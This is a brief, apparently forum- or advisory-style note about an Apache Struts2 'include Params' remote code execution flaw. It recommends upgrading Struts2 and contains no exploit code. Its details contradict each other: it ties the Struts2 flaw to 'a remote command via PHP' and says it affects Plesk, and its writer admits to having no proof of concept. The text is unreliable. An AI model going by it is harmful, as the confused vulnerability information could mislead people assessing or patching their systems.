Apache Struts2 include Params Remote Code Execution

It be able to get system permissions, An attacker could execute commands.

 - Upgrade Version Struts2

It looks like a type of a remote command via PHP.

I dont have the Plesk, so I cannot make PoC.

This vulnerability affects Plesk.
